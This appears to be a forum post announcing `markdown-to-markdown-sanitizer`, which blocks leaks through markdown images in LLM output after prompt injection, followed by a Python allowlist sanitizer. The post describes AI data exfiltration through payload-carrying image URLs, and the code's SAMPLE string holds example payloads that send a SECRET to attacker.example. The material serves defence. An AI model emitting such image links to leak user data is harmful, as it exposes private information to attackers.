Payload-carrying markdown images are the go-to data exfil technique for AI hacking. AI flagship products seem to be using regex-based filtering or worse -- they ask the LLM. Both lead to bypasses, but markdown rendering can become a hard boundary. This is a really cool project!
Releasing `markdown-to-markdown-sanitizer`, a markdown sanitizer focused on avoiding information leakage from prompt injection attacks[1]. Creating this was primarily motivated by @simonw's recent post about a Gitlab vulnerability[1]. I think this vulnerability is very widespread
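To make the "rendering as a hard boundary" idea concrete, here is an added example of the allowlist approach the thread contrasts with regex blocklists: every spelling of an image is recognised, re-serialised in one canonical form only if its host is explicitly permitted, and otherwise collapsed to its alt text; reference definitions are dropped and raw HTML is escaped so nothing the rewriter does not understand survives as an image. This is constructed illustration code, not the `markdown-to-markdown-sanitizer` project's implementation; the `ALLOWED_IMAGE_HOSTS` set, the `images.example.com` and `attacker.example` hosts and the `SAMPLE` text are all made up for the demo. A production sanitizer should sit on a full CommonMark parser rather than this reduced tokenizer, and links (click-required, so out of scope here) would get the same allowlist treatment.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist: the only hosts an image may be loaded from.
ALLOWED_IMAGE_HOSTS = {"images.example.com"}

# One pattern for every spelling of an image:
#   ![alt](dest "title")   ![alt](<dest>)   ![alt][ref]   ![alt][]   ![alt]
IMAGE = re.compile(
    r"!\[(?P<alt>[^\]]*)\]"                          # ![alt]
    r"(?:\(\s*<?(?P<dest>[^\s<>()]*)>?"              # (dest  or  (<dest>
    r"(?:\s+(?:\"[^\"]*\"|'[^']*'))?\s*\)"           # optional "title", then )
    r"|\[(?P<ref>[^\]]*)\])?"                        # or [ref] / [] / nothing
)

# Link reference definitions ([id]: dest) on their own line.
REF_DEF = re.compile(r"^[ ]{0,3}\[[^\]]+\]:[ \t]*\S.*$", re.MULTILINE)


def image_allowed(dest):
    """Allowlist check: http(s) only, and the parsed host must be permitted.
    urlsplit() lowercases the host and handles user@host forms for us."""
    parts = urlsplit(dest.strip())
    return parts.scheme in ("http", "https") and parts.hostname in ALLOWED_IMAGE_HOSTS


def sanitize(markdown):
    """Return (clean_markdown, removed). `removed` lists the image destinations
    (or reference labels) that were stripped, so callers can log or alert."""
    removed = []

    def rewrite(m):
        alt, dest, ref = m.group("alt"), m.group("dest"), m.group("ref")
        if dest is not None and image_allowed(dest):
            # Re-serialise in canonical form; never echo the original bytes.
            return f"![{alt}]({dest.strip()})"
        # Reference-style images can no longer resolve (definitions are gone),
        # and inline images off the allowlist collapse to their alt text.
        removed.append(dest if dest is not None else f"ref:{ref or alt}")
        return alt

    text = REF_DEF.sub("", markdown)       # drop all [id]: url definitions
    text = IMAGE.sub(rewrite, text)        # allowlist every image form
    text = text.replace("<", "&lt;")       # neutralise raw HTML such as <img>
    return text, removed


# Constructed sample: one legitimate image plus several off-allowlist forms.
SAMPLE = (
    "Summary of the issue:\n"
    "![logo](https://images.example.com/logo.png)\n"
    "![ ](https://attacker.example/collect?d=SECRET)\n"
    "![x][leak]\n"
    '<img src="https://attacker.example/i?d=SECRET">\n'
    "\n"
    "[leak]: https://attacker.example/ref?d=SECRET\n"
)

if __name__ == "__main__":
    clean, stripped = sanitize(SAMPLE)
    print(clean)
    print("stripped:", stripped)
```

The deciding property is that the default outcome is "no image": anything the tokenizer cannot positively classify as an allowed inline image becomes plain text, which is the opposite of a blocklist regex that only removes what it happens to recognise.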